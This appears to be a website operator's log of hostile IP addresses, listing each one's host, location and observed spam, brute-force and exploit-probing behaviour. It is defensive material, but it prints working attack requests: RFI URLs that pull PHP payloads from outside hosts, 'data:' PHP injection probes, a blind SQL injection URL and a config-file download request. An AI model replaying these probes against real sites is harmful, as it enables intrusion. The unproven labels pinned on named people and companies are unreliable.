199.19.72.90 Host: United States – Minneapolis Vegasnap Llc dDoS attacker – over 400 attempts in 2 minutes to post comments
Comment spammer
94.23.66.134 Hostname: kin3.nextware.eu
Host: Italy – Trieste Ovh Systems
Shared hosting web server: 56 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Bad host: OVH Systems
140.115.49.1 Host: Taiwan – Taipei Taiwan Academic Network Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Hetzner Online has multiple bad IPs
88.198.25.130 Hostname: static.88-198-25-130.clients.your-server.de
Host: Germany – Nuremberg Hetzner Online Ag
Shared hosting web server: 11 websites
Brute force attack looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Hetzner Online has multiple bad IPs
64.132.166.194 Hostname: 64-132-166-194.bridgeworldwide.com
United States – Cincinnati Bridge Worldwide
Dictionary attacker
95.31.42.89 Hostname: 95-31-42-89.broadband.corbina.ru
Host: Russian Federation – Moscow Ojsc Vimpelcom
Trackback spammer
199.15.233.130 Host: United States – Fort Worth Julian Roskilly Comment spammer
Bad host: More IPs
190.145.116.3 Host: Colombia – Bogota Telmex Colombia S.a. Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.73.137.105 Hostname: msa.com.tr mutfaktakariyer.com
Host: Turkey – Istanbul Cizgi Telekomunikasyon Hizmetleri Sanayi Ve Ticaret Limited Sirketi
Web server – 2 website: haberpusula.com
Brute force / dictionary attacker
Tried to login to /user/ with name “admin”
Looking for Bitrix exploit vulnerability
184.105.235.22 Host: United States – Fremont Hurricane Electric Inc.
Shared hosting web server: 50 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/weekly/timthumb.php?src=
http %3A%2F%2Fflickr.com.013.in.rs%2Ftausug.php
37.123.99.212 Host: Turkey – Izmir Salay Telekomunikasyon Ticaret Limited Sirketi Attempting to login to site admin – /wp-login.php
173.70.141.147 Hostname: pool-173-70-141-147.nwrknj.fios.verizon.net
Host: United States – Springfield Verizon Online Llc
Rule breaker. Ignoring robots.txt
Looking fo rscripts:
/translate_static/js/element/main.js
/translate_static/js/element/hrs.swf
/.google-analytics.com/ga.js
88.190.61.187 Hostname: 88-190-61-187.rev.poneytelecom.eu
Host: France – Paris Dedibox Sas
Comment spammer
95.173.163.156 Hostname: 1560n2rzi.ni.net.tr
Host: Turkey – Izmir Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti
Web server – 1 website: haberpusula.com
Dictionary attacker
/wp-login.php
/administrator/index.php
/admin.php
/admin/index.php
/user/
/bitrix/admin/index.php?lang=en
91.215.216.30 Hostname: star.icnhost.net
Host: Bulgaria – Plovdiv Internet Corporated Networks Ltd.
Shared hosting web server: 232 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.181.68.251 Hostname: net68.79.95-251.izhevsk.ertelecom.ru
Host: Russian Federation – Izhevsk Cjsc Er-telecom Holding
Dictionary attacker, mail server
Bad host
67.212.91.121 Hostname: yonca.sibername.com
Host: Canada – Laval Netelligent Hosting Services Inc
Shared hosting web server: 470 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/Growing-Feature/includes/thumb.php?src=http%3A%2F%2Fflickr.com.dancesport.ro%2Fbad.php
46.229.164.100 Host: Netherlands – Amsterdam Haldex Ltd Spy bot: SemrushBot
User agent: Mozilla/5.0 (compatible; SemrushBot/0.96.4; +http:
//www.semrush.com/bot.html)
91.226.212.79 Host: Russian Federation – Ivanovo Pe Ivanov Vitaliy Sergeevich
Shared hosting web server: 183 websites
Attempting joomlacontenteditor (com_jce) BLIND sql injection vulnerability exploit.
//index.php?6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b&cid
=20&file=imgmanager&method=form&option=com_jce&plugin=imgmanager&task=plugin/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method
=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
173.208.2.83 Hostname: 173.208.2.83.rdns.ubiquityservers.com
Host: United States – Chicago Ubiquity Server Solutions Chicago
Comment spammer
85.17.29.107 Hostname: hosted-by.leaseweb.com
Host: Netherlands – Amsterdam Leaseweb B.v.
Rule breaker, badly configured bot.
Possibly a web scraper.
95.173.184.198 Hostname: 1987yeawc.ni.net.tr
Host: Turkey – Denizli Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Web server – 3 websites: classyazilim.com.tr , classyazilim.org , yazilimvadisi.net
Trying to login with user name “admin”
/user/
190.215.45.22 Host: Chile – Santiago Cristian Alejandro Campos Cerda
Shared hosting web server: 66 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.102.5.42 Hostname: 4280wrd6.ni.net.tr
Host: Turkey – Izmir Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Shared hosting web server: 41 websites
Hacker/hackerbot looking for Bitrix CMS admin:
admin/index.php
admin/login.php
/bitrix/admin/index.php?lang=en
/user/
199.15.233.138 Host: United States – Fort Worth Justin Downing Comment spammer / Bad host
208.43.225.84 Hostname: 208.43.225.84-static.reverse.softlayer.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server – 1 website: siteexplorer.info
Site Explorer bot:
Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)
Rule breaker, spy-bot
61.38.186.55
61.38.186.76
Host: Korea – Seoul Dacom Corp. Comment spammer
98.126.218.98 Host: United States – Orange Krypt Technologies Comment spammer / Bad host
95.173.184.203 Hostname: 203unclhh.ni.net.tr
Host: Turkey – Denizli Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Web server – 1 website: kouportal.com
Hacker/hackerbot looking for Bitrix CMS admin:
admin/index.php
admin/login.php
/bitrix/admin/index.php?lang=en
/user/
138.91.32.89 Host: United States – Redmond Microsoft Corp
Shared hosting web server: 4 websites
Attempting Snippet Master PHP Injection/ RFI exploit
//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=SnippetMastertest??
/&sa=U&ei=HUUSUq_UI8aw7Qa6nYGQAg&ved=0CM8BEBYwMQ&usg=AFQjCNFlgAmGeGg2TlcwArmwIyw8n4471w//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=SnippetMastertest??
93.135.123.29 Hostname: mnch-5d877b1d.pool.mediaWays.net
Host: Germany – Aschheim Ncc
Dictionary attack on wp-login
192.119.144.90 Host: United States – Dallas Paige Chen Comment spammer
Bad host: Paige Chen
37.220.22.10 Hostname: h37-220-22-10.host.redstation.co.uk
Host: Iran – Tehran Redstation Limited
Shared hosting web server: 40 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.phpBAD HOST: Redstation
148.208.243.2 Host: Mexico – Mexico City Secretaria De Educacion E Investigacion Tecnologic Looking for Joomla exploit
URL&=U&;ei=Dkr4UY35LNHK4APO8IHYAw&;ved=0CG0QFjAaOMgB&
;usg=AFQjCNFoj0HrqUsQIxH94ooX6N856i8mUw/
images/stories/3xp.php
DOMAIN/images/stories/3xp.php
94.127.188.17 Hostname: sm07.hospedando.com
Host: Spain – Alicante Access Basic Server S.l.
Shared hosting web server: 55 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
74.126.182.74 Hostname: 74-126-182-74.lucn.us
Host: United States – Pasadena Te Idc
Comment spammer
188.227.225.144 Hostname: masterproject.hu
Host: Hungary – Budapest Doclerweb Kft.
Shared hosting web server: 20 websites
Hacker/hackerbot:
Looking for admin pages
/admin/administrators.php/login.php
151.237.190.187 Host: Sweden – Stockholm Deepak Mehta Fie Commospammer
Bad host: Deepak Mehta Fie
188.165.53.2 Host: France – Roubaix Ovh Systems Comment spammer
Bad host: Roubaix Ovh Systems
195.161.40.10 Host: Russian Federation – Moscow Ojsc Rtcomm.ru Mail server, dictionary attacker
Very high threat rating. BAN it now
199.91.65.138 Hostname: ip-199-91-65-138.rackalley.net
Host: United States – Los Angeles Rack Alley Llc
Web server – 2 websites: jesuslapps.com , livesoccartv.com
Hacker bot looking for:
/admin
/administrator
/checkout/cart
Malicious user agent: Apache-HttpClient/4.2.3 (java 1.5)
116.112.66.102 Host: China – Hohhot Innermengoliahuhhuttaipingyangcaichanbaoxian spam harvester, mail server, dictionary attacker, comment spammer, rule breaker
144.76.34.169 Hostname: sh-507.premium.hosttech.eu
Host: Germany – Nuremberg Server Block
Shared hosting web server: 19 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
RFI attack
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
/admin/banner_manager.php/login.php?action=insert
/admin/categories.php/login.php?cPath=&action=new_product_preview
admin/file_manager.php/login.php?action=processuploads
59.47.43.92 Host: China – Shenyang Chinanet Liaoning Province Network Comment spammer
72.46.141.186 Host: United States – Chicago Versaweb Llc
Web server – 2 websites: fashionbo.com , w2v2.com
Hacker looking for exploit
wp-content/plugins/omni-secure-files/plupload/examples/upload.php
108.163.197.58 Hostname: host14.server5.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
Bad host: Chicago Singlehop
216.244.79.171 Hostname: 171.static.sea.rackd.net
Host: United States – Seattle Private Customer
Comment spammer
69.152.127.130 Hostname: mail.bhlaw.net
Host: United States – Richardson Brown And Hofmeister Llp
Hacker looking for exploits – known FCK editor vulnerabilty
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
108.163.194.35 Hostname: host11.server10.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
Bad host: Chicago Singlehop
192.119.144.92 Host: United States – Dallas Paige Chen Comment spammer
69.22.169.51 Host: United States – Big Cove Tannery Giglinx Inc. Comment spammer
Bad host:
208.85.3.210 Hostname: 208-85-3-210.STATIC.turnkeyinternet.net
Host: United States – Tempe Turnkey Internet Inc.
Shared hosting web server: 18 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
69.175.121.51 Hostname: host12.server15.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
Bad host: Chicago Singlehop
37.59.227.68 Host: France – Roubaix Ovh Systems Comment spammer
Bad host: Roubaix Ovh Systems
184.154.255.188 Hostname: host4.server6.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
Bad host: Chicago Singlehop
81.169.138.77 Hostname: h2156579.stratoserver.net
Host: Germany – Berlin Strato Ag
Shared hosting web server: 12 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
201.99.57.24 Hostname: dsl-201-99-57-24-sta.prod-empresarial.com.mx
Host: Mexico – Mexico City Uninet S.a. De C.v.
Shared hosting web server: 5 websites
DoS attack
67.152.72.226 Hostname: ip67-152-72-226.z72-152-67.customer.algx.net
Host: United States – New York City Xo Communications
Mail server / Dictionary attacker
199.15.233.133 Host: United States – Fort Worth Julian Roskilly Comment spammer
184.154.254.58 Hostname: hos26.server15.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
37.59.202.65 Host: France – Roubaix Ovh Systems Comment spammer
Bad host: Roubaix Ovh Systems
208.98.38.195 Host: United States – Missoula Sharktech Some sort of mis-configured bot – adding #main-content to all URLs
74.220.219.144 Hostname: box544.bluehost.com
Host: United States – Provo Unified Layer
Shared hosting web server: 89 websites
Trying to access /wp-admin
Bad web host
199.195.129.156 Host: United States – Minneapolis Vegasnap Llc Comment spammer
DoS attempt to post comment where no comment form exists – more than 1000 attempts logged in 90 seconds
36.248.241.71 Host: Chine – Fuzhou Xiamen City Fujian Provincial Network Of Unicom Brute force registration attempt using common registration paths
87.205.47.103 Hostname: 87-205-47-103.adsl.inetia.pl
Host: Poland – Warsaw Netia Sa
Trying to access wp-signup
Bad host
108.27.246.123 Hostname: pool-108-27-246-123.nycmny.fios.verizon.net
Host: United States – New York City Verizon Online Llc
Comment spammer
41.203.30.10 Host: South Africa – Johannesburg Hetzner (pty) Ltd Comment spammer
Bad host
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
199.180.129.205 Host: United States – Lawrence Dnsslave.com
Web server – 1 website: luvdy.com
Comment spammer
50.115.173.129 Host: United States – Kansas City Dnsslave.com
Web server – 1 website: 0538buy.com
Comment spammer
86.149.161.254 Hostname: host86-149-161-254.range86-149.btcentralplus.com
Host: United Kingdom – London Bt Public Internet Service
Looking for scripts
/jquery.min.map
192.227.137.179 Hostname: host.colocrossing.com
Host: United States – Kingston Hudson Valley Host
Comment spammer
216.244.71.18 Host: United States – Seattle Private Customer Comment spammer
188.165.44.4 Host: France – Roubaix Ovh Systems Comment spammer
Bad host
199.15.233.137 Host: United States – Fort Worth Justin Downing Comment spammer
108.61.45.43 Hostname: hosted-by.reliablesite.net
Host: United States – Greenwich Reliablesite.net Llc
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Combined Brute force DoS attack with IP 195.186.81.56
195.186.81.56 Hostname: 56-81-186-195.bluewin.ch
Host: Switzerland – Zurich Bluewin Is An Internet Service Provider In Ch.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Combined Brute force DoS attack with IP 108.61.45.43
92.243.166.8 Host: Russian Federation – Moscow Akado-stolitsa Jsc Comment spammer
192.119.151.115 Host: United States – Dallas Avante Vps Comment spammer
37.202.4.134 Host: Germany – Espelkamp Mittwald Cm Service Gmbh Und Co.kg
Shared hosting web server: 14 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
107.20.161.197 Hostname: ec2-107-20-161-197.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web address: Bollywood Hungama
Comment spammer
Bad activity – looking for /music.php
/music.php?audioid=1778827&protocol=httpdl&page=homepage
204.9.204.181 Hostname: 204.9.204.181.uscolo.com
Host: United States – Los Angeles Allcomm
Web server – 2 websites: bentleyharris.co , titanelectronics.co
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
85.214.243.241 Hostname: h2015152.stratoserver.net
Host: Germany Berlin Strato Ag
Shared hosting web server: 417 websites
RFI attempt – looking for vulnerability in:
/images/stories/3xp.php
110.181.37.1 Host: China – Datong Shanxi Telecom Datong Branch Ip Node Links To Customer Ip Address RFI attempt – looking for vulnerability in:
/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php
80.86.107.60 Hostname: static.12.39.40.188.clients.your-server.de
Host: Romania – Bucharest Ines Group Srl
Shared hosting web server: 49 websites
RFI attempt – looking for vulnerability in:
/images/stories/3xp.php
208.50.101.156 Company: United States – Broomfield Level 3 Communications Inc. Malware injection attempt:
Trying to inject atualizacao.cpl trojan to website
174.36.204.225 Hostname: 174.36.204.225-static.reverse.softlayer.com
Company: United States – Chicago Softlayer Technologies Inc.
Web server – 2 websites: phonenumbers.cc , vstats.co
Rule breaker / Bad bot
SiteExplorer/1.0
208.43.225.85 Hostname: 208.43.225.85-static.reverse.softlayer.com
Company: United States – Chicago Softlayer Technologies Inc.
Rule breaker / Bad bot
SiteExplorer/1.0
199.167.150.19 Hostname: tekverse.net
Host: United States – Tampa Noc4hosts Inc.
Web server – 1 website: tekverse.net
Comment spammer
Mail server
192.95.18.134 Host: France – Roubaix Ovh Systems Comment spammer
Bad host: Roubaix Ovh Systems
192.184.37.122 Host: United States – Walnut Psychz Networks Comment spammer
Bad host: Psychz Networks
192.74.240.210 Host: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Web server – 1 website: yigouwo.com
Comment spammer
Bad host: PEG TECH INC
184.154.167.78 Hostname: host35.server4.vpn999.com
Host: United States – Chicago Singlehop Inc.
Comment spammer
Trying to post links to malware scripts
Seen with hijacked browser user agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
61.38.186.76 Host: Korea, Republic Of – Seoul Dacom Corp.
Web server – 1 website: tb999.com
Comment Spammer
63.143.46.146 Hostname: destakfotoseproducoes.net
Host: United States – Dallas Limestone Networks Inc.
Web server: 2 websites – destakfotoseproducoes.net , pokemonxplus.org
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
188.40.39.12 Hostname: static.12.39.40.188.clients.your-server.de
Host: Germany – Nuremberg Hetzner Online Ag
Shared hosting web server: 29 websites
Hacker looking for vulnerabilities
/admin/sqlpatch.php/password_forgotten.php?action=execute
Seems like targeting WordPress wpOnlineStore plugin
184.171.165.72 Host: United States – Phoenix Secured Servers Llc Looking for exploit vulnerabilities
/137595395452036422d831f.php
/cookie_usage.php
/shopping_cart.php
/product_info.php
173.226.23.2 Hostname: firewall.brentwoodacademy.com
Host: United States – Nashville Tw Telecom Holdings Inc.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
172.246.132.154 Host: United States – Henderson Enzu Inc Comment Spammer
192.119.144.85 Host: United States – Dallas Paige Chen
Avante Hosting Services Inc
Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
94.205.129.184 Host: United Arab Emirates – Emirates Integrated Telecommunications Company Pjsc Comment Spammer
76.74.153.52 Hostname: server1.sexygirlsandwomen.com
Host: United States – Los Angeles Serverbeach
Shared hosting web server: 109 websites
Dictionary attack on wp-login using multiple usernames
50.87.109.74 Hostname: 50-87-109-74.unifiedlayer.com
Host: United States – Provo Unified Layer
Shared hosting web server: 28 websites
Trying to access wp-admin/config.php
190.37.96.246 Host: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela Restricted region
looking for non-existent URLs
199.15.236.59 Host: United States – Tampa Noc4hosts Inc. Comment Spammer
198.178.121.122 Hostname: 198-178-121-122.static.hvvc.us
Host: United States – Fort Worth Digit Revenue
Rule breaker – User Agents:
Mozilla/5.0 (compatible; DioDiscover/1.7; +https://www.Datadio.com)
Mozilla/5.0 (compatible; DioScout/1.7; +https://www.Datadio.com)
Looking for non-existent file – /external.php and RSS feeds
5.135.77.222 Host: France – Roubaix Ovh Systems Comment Spammer
Bad host
192.187.125.194 Host: United States – Kansas City Datashack Lc Comment Spammer
208.115.226.216 Hostname: marquetingblackdever.com
Host: United States – Dallas Limestone Networks Inc.
Web server: marquetingblackdever.com
Remote File Inclusion probe / WordPress GD star ratings RFI exploit:
/wp-content/gd-star-rating/tumbh.php?src=http:
//picasa.com.tuson.ca/Fbat.php
88.242.99.82 Hostname: 88.242.99.82.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
DoS attack on /administrator/index.php
151.237.178.148 Host: United States – Amsterdam Deepak Mehta Fie Trying to post content
/node/add
Bad host
75.145.114.169 Hostname: 75-145-114-169-Colorado.hfc.comcastbusiness.net
Host: United States – Lafayette Random Android Apps
Shared hosting web server: 5 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.171.165.50 Host: United States – Phoenix Secured Servers Llc Scanning for exploit vulnerabilties
/137565348951fece711d53d.php
/shopping_cart.php
cookie_usage.php
/137565352051fece900cc84.php
/product_info.php
86.96.229.68 Host: United Arab Emirates – Dubai Emirates Telecommunications Corporation Comment Spammer
184.107.176.162 Hostname: host.eprogear.com
Host: Canada – Montreal Roberts Diesel Works Inc
Shared hosting web server: 19 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php
src=http: //flickr.com.timomentum.com.br/bad.php
85.25.248.40 Hostname: besthand.de
Host: Germany – Hurth Intergenia Ag
Shared hosting web server: 69 websites
Multiple Violations
1. Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php2. Fake User Agent:
FreeWebMonitoring SiteChecker/0.1 (+http: //www.freewebmonitoring.com)
36.250.177.28 China – Putian City Fujian Provincial Network Of Unicom Comment spammer
64.34.170.56 Hostname: server80.it4business.ca
Host: United States – Newhall Serverbeach
Shared hosting web server: 15 websites
Comment spammer – very high threat rating
89.253.242.44 Hostname: kirana.ru
Host: Russian Federation – Moscow Rusonyx Ltd.
Shared hosting web server: 89 websites
Looking for RFI exploit vulnerabilities
69.195.106.122 Hostname: 69-195-106-122.unifiedlayer.com
Host: United States – Provo Unified Layer
Shared hosting web server: 14 websites
Looking for RFI exploit vulnerabilities
/lib/connected_users.lib.php3?ChatPath=data:,%3C?php
%20print-439573653*57;%20?%3E?
37.72.170.98 Hostname: 98.170.72.37.static.swiftway.net
Host: United States – Chicago Eureka Solutions Sp. Z O.o.
Crawling forbidden URLs
64.34.170.56 Hostname: server80.it4business.ca
Host: United States – Newhall Serverbeach
Shared hosting web server: 15 websites
Comment spammer – very high threat rating
92.53.123.104 Hostname: hawking.timeweb.ru
Host: Russian Federation – Moscow Ooo Lira-s
Shared hosting web server: 2360 websites
Looking for Black Hole Exploit:
/modules/mod_xsystem/mod_xsystem.php
185.12.92.249 Hostname: o.deserv.net
Host: Russian Federation – Tyumen’ Closed Joint Stock Company Ruweb
Shared hosting web server: 294 websites
Looking for RFI exploit vulnerabilities in Phpheaven
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=
data:,%3C?php%20print-439573653*57;%20?%3E
144.76.40.81 Hostname: static.81.40.76.144.clients.your-server.de
Host: Germany – Nuremberg Server Block
Shared hosting web server: 118 websites
Looking for RFI exploit vulnerabilities in Redaxo CMS
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=data:,%3C?php%
20print-439573653*57;%20?%3E
89.111.184.41 Hostname: 1094.ovz80.hc.ru
Host: Russian Federation – Moscow Garant-park-telecom Ltd.
Shared hosting web server: 3 websites – fibermag.ru , shs-systems.ru , spinetix.info
Looking for RFI exploit vulnerabilities in Broadband Mechanics
PeopleAggregator Module:
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=data:,%3C?php%20
print-439573653*57;%20?%3E
188.132.135.38 Hostname: static-38-135-132-188.sadecehosting.net
Host: Turkey – Basaksehir Hosting Internet Hizmetleri Sanayi Ve Ticaret Anonim Sirketi
Trying to access wp_login.php
69.22.184.117 Host: United States – Torrance Giglinx Inc.
nLayer Communications, Inc
Comment spammer
Bad host: Torrance Giglinx Inc
172.245.209.139 Hostname: host.colocrossing.com
Host: United States – San Francisco Amazon.com Inc.
Shared hosting web server: 29 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Specific attack on wpOnlineStore – determined by URL:
DOMAIN/wponlinestore-exploit-vulnerability&sa=U&;ei=n9v5UcmiBoLU9ATS04H4Aw&ved=0COUBEBYwPQ&usg=AFQjCNGlkBGh8L-8GS1AJQMHis0WuQmi_g/
admin/file_manager.php/login.php
184.169.203.101 Hostname: ec2-184-169-203-101.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon.com Inc.
Malicious bot / Rule breaker: UnwindFetchor/1.0
UA: UnwindFetchor/1.0 (+http://www.gnip.com/)
188.163.32.48 Hostname: SOL-FTTB.48.32.163.188.sovam.net.ua
Host: Ukraine – Zhytomyr Golden Telecom
Comment spammer
Bad host
204.124.182.156 Host: United States – Scranton Volumedrive Comment spammer
192.114.71.13 Hostname: bzq-114-71-13.static.bezeqint.net
Host: Israel – Petah Tikva Bezeq International Previously Trendline
Rule breaker bot
Multiple user agents on site at same time (like DoS attack)
41.0.33.42 Hostname: dynamic.compuking.co.za
Host: South Africa – Cape Town Vodacom
Shared hosting web server: 43 websites
Looking for Joomla exploit
URL&=U&;ei=Dkr4UY35LNHK4APO8IHYAw&;ved=0CG0QFjAaOMgB&
;usg=AFQjCNFoj0HrqUsQIxH94ooX6N856i8mUw/
images/stories/3xp.php
198.56.193.75 Hostname: 75.193-56-198.rdns.scalabledns.com
Host: United States – Los Angeles Enzu Inc
Comment spammer
173.234.196.102 Host: United States – Chicago Ubiquity Server Solutions Chicago
Web server: 2 websites – chandou.com.cn , kxsky.com
Comment spammer
Running a spambot from website
50.31.240.136 Hostname: 50.31.240.136.static.midphase.com
Host: Japan – Tokyo Hosting Services Inc.
Comment spammer
94.27.93.73 Hostname: SOL-FTTB.73.93.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
94.27.76.55 Hostname: SOL-FTTB.55.76.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
103.4.146.66 Hostname: mail.deshbd.com
Host: Bangladesh – Dhaka Next Online Ltd Isp Of Bangladesh
Trying to add content
node/add
188.163.12.67 Hostname: SOL-FTTB.67.12.163.188.sovam.net.ua
Host: Ukraine – Zhytomyr Golden Telecom
Comment spammer
Bad host
151.236.47.157 Hostname: 151-236-47-157.static.as29550.nett
Host: United Kingdom – Maidenhead Simply Transit Ltd
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
87.10.182.181 Hostname: host181-182-dynamic.10-87-r.retail.telecomitalia.it
Host: Italy – Roma Telecom Italia Net
Login attempt
Malicious user agent: Java/1.4.1_04
173.199.117.243 Hostname: 173.199.117.243.ahrefs.com
Host: United States – Piscataway Ahrefs Inc.
AS-CHOOPA – Choopa, LLC
Part of Ahrefs spy network
ahrefsbot
213.186.120.196 Hostname: 213.186.120.196.utel.net.ua
Host: Ukraine – Donets’k Utel Internet Services
Part of Ahrefs spy network
ahrefsbot
212.113.35.162 Hostname: nano2.dc.ukrtelecom.ua
Host: Ukraine – Kiev Utel Internet Services
Part of Ahrefs spy network
ahrefsbot
132.177.140.64 Host: United States – Durham University Of New Hampshire Malicious IP
50.97.33.178 Hostname: 50.97.33.178-static.reverse.softlayer.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server: 1 website – ahrefs.com
Commercial spy organisation – Ahrefs
67.222.8.20 Hostname: host.augustineenterprisesbeta.com
Host: United States – Golden Privatesystems Networks Ca
Shared hosting web server: 20 websites
Looking for exploit possibilities
/wp-content/sxd/backup/
/wp-content/dumper/backup/
/sxd/backup/
/dumper/backup/
190.38.16.64 Hostname: 190-38-16-64.dyn.dsl.cantv.net
Host: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Comment spammer
94.27.92.78 Hostname: SOL-FTTB.78.92.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer, mail server
Bad host
106.2.166.225 Host: China – Beijing Beijing Kuanjie Net Communication Technology Ltd Spy bot: CloudServerMarketSpider/1.0
Mozilla/5.0 (compatible; CloudServerMarketSpider/1.0; +http: //www.cloudservermarket.com/spider.html)
71.181.95.134 Hostname: static-71-181-95-134.man.east.myfairpoint.net
Host: United States – Nashua Cis Technical
Shared hosting web server: 79 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.206.5.93 Hostname: lserver116.megavelocity.net
Host: United States – Kansas City Firedhost
Shared hosting web server: 39 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.245.221.5 Host: United States – Prosser Egihosting Comment spammer
188.163.34.20 Hostname: SOL-FTTB.20.34.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
192.151.156.250 Host: United States – Kansas City Firedhost
Web server: 1 website – mu-deathzone.com
Comment / trackback spammer
41.203.67.51 Host: Nigeria – Kaduna Globacom Information Systems Department Comment spammer, mail harvester, dictionary attacker
